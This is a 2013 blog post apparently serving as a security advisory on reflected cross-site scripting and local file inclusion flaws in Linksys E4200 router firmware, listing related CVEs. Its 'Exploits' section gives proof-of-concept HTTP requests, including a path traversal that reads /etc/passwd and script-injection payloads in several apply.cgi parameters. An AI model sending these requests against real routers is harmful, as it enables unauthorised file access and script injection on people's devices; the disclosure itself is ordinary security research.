Anti-Phishing Research, Tombstones

Monday, May 6, 2013

XSS, LFI, Linksys E4200 Firmware, 0D


XSS, LFI in Cisco, Linksys E4200 Firmware

CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684

Keywords

XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp   

Credits

Summary

Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router Firmware Version: 1.0.05 build 7 were discovered by our Researchers in January 2013 and finally acknowledged by Linksys in April 2013. The Vendor is unable to Patch the Vulnerability in a reasonable timeframe. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions.

Overview

Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold their home networking division and Linksys to Belkin. Former Linksys products are now branded as Linksys by Cisco.

Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video camera, AV products, network storage systems, and other products.

Linksys products were widely available in North America off-the-shelf from both consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competition as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel.

Vendor Software

# Copyright (C) 2009, CyberTAN Corporation
# All Rights Reserved.
#
# THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY
# KIND, EXPRESS OR IMPLIED, BY STATUTE.....

The Exploits

LFI PoC

POST /storage/apply.cgi HTTP/1.1
HOST: my.vunerable.e4500.firmware
submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd

LFI Results

XSS PoC

   /apply.cgi [log_type parameter]
   /apply.cgi [ping_ip parameter]
   /apply.cgi [ping_size parameter]
   /apply.cgi [submit_type parameter]
   /apply.cgi [traceroute_ip parameter]
   /storage/apply.cgi [new_workgroup parameter]
   /storage/apply.cgi [submit_button parameter]

POST /apply.cgi HTTP/1.1
…..
change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_type=&log_type=ilog14568"%3balert(1)//482

XSS Results

Other XSS PoC’s

&ping_ip=a.b.c.ddb0'><script>alert(1)</script>9479e857331
&ping_size=32dd369'><script>alert(1)</script>71a6e17036a
&submit_type=start_traceroute10808'%3balert(1)//922
&traceroute_ip=a.b.c.df0db4"><script>alert(1)</script>0f8d07c59be

CVE Information

File path traversal CVE-2013-2678
Cross-site scripting (reflected) CVE-2013-2679
Cleartext submission of password CVE-2013-2680
Password field with autocomplete enabled CVE-2013-2681
Frameable response (Clickjacking) CVE-2013-2682
Private IP addresses disclosed CVE-2013-2683
HTML does not specify charset CVE-2013-2684

CVSS Version 2 Score = 4.5

Version Information

No comments:

Post a Comment